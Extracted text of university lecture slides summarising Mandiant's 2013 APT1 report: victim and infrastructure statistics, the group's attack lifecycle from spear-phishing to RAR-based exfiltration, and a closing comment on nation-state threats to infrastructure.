ECE-6612 http://www.csc.gatech.edu/copeland/jac/6612/ Prof. John A. Copeland john.copeland@ece.gatech.edu 404 894-5177 Advanced Persistent Threat Material excerpted from Mandiant APT1 Report – www.mandiant.com/apt1 Feb. 22, 2013 APT1 has systematically stolen hundreds of terabytes of data from at least 141 organizations, and has demonstrated the capability and intent to steal from dozens of organizations simultaneously. »» Since 2006, Mandiant has observed APT1 compromise 141 companies spanning 20 major industries. »» APT1 has a well-defined attack methodology, honed over years and designed to steal large volumes of valuable intellectual property. »» Once APT1 has established access, they periodically revisit the victim’s network over several months or years and steal broad categories of intellectual property, including technology blueprints, proprietary manufacturing processes, test results, business plans, pricing documents, partnership agreements, and emails and contact lists from victim organizations’ leadership. »» APT1 uses some tools and techniques that we have not yet observed being used by other groups including two utilities designed to steal email — GETMAIL and MAPIGET. *** »» Among other large-scale thefts of intellectual property, we have observed APT1 stealing 6.5 terabytes of compressed data from a single organization over a ten-month time period. »» In the first month of 2011, APT1 successfully compromised at least 17 new victims operating in 10 different industries. 2/24/2013 Mandiant APT1 Report – www.mandiant.com/apt1 2 APT1 maintains an extensive infrastructure of computer systems around the world. »» APT1 controls thousands of systems in support of their computer intrusion activities. »» In the last two years we have observed APT1 establish a minimum of 937 Command and Control (C2) servers hosted on 849 distinct IP addresses in 13 countries. The majority of these 849 unique IP addresses were registered to organizations in China (709), followed by the U.S. (109). »» In the last three years we have observed APT1 use fully qualified domain names (FQDNs) resolving to 988 unique IP addresses. »» Over a two-year period (January 2011 to January 2013) we confirmed 1,905 instances of APT1 actors logging into their attack infrastructure from 832 different IP addresses with Remote Desktop, a tool that provides a remote user with an interactive graphical interface to a system. »» In the last several years we have confirmed 2,551 FQDNs attributed to APT1. 2/24/2013 Mandiant APT1 Report – www.mandiant.com/apt1 3 Initial Reconnaissance Study the target’s Web Pages, do Google and Bing searches. Learn the names of employees, particularly executives and engineers. Study them on social networks (YouTube, LinkedIn, Facebook, Twitter, … ). Initial Compromise Craft spear-phishing messages with Trojan Horse attachments, links, jpegs, … - or Take advantage of a fortuitous compromise by a wide-spread exploit. Establish Foothold Add root kits and backdoors. Initial Recon. Maintain Presence Move Laterally Initial Establish Compromise Foothol d Escalate Privileges 2/24/2013 Internal Recon. Mandiant APT1 Report – www.mandiant.com/apt1 Complete Mission (leave back doors) 4 On some occasions, unsuspecting email recipients have replied to the spear phishing messages, believing they were communicating with their acquaintances. It’s legit -> 2/24/2013 In one case a person replied, “I’m not sure if this is legit, so I didn’t open it.” Within 20 minutes, someone in APT1 responded with a terse email back: “It’s legit.” Mandiant APT1 Report – www.mandiant.com/apt1 5 After creating files compressed via RAR, the APT1 attackers will transfer files out of the network in ways that are consistent with other APT groups, including using the File Transfer Protocol (FTP) or their existing backdoors. . rar Many times their RAR files are so large that the attacker splits them into chunks before transferring them. Figure 19 above shows a RAR command with the option “-v200m”, which means that the RAR file should be split up into 200MB portions. FIGURE 20: APT1 bundles stolen files into “rar” archives before moving data to China 2/24/2013 Mandiant APT1 Report – www.mandiant.com/apt1 6 Worth Noting The APT has only collected information (commercial, government, military), trying not to leave a trace of its presence. Unlike gangster hacking organizations, there have been no deliberate damages (deletion of data, denial of service, …) or demands for payment. The APT (and other nation-level organizations) have reconnoitered Internet backbones and utility infrastructure networks, and have put back doors and logic bombs in place. They are apparently developing to capability to do extensive physical damage to the U.S. infrastructure and economy if (or maybe, when) it becomes advantageous to do so. Ref. "Cyberwar, the Next Threat to National Security, and What to Do About It," by Richard C. Clark (2010). 2/24/2013 7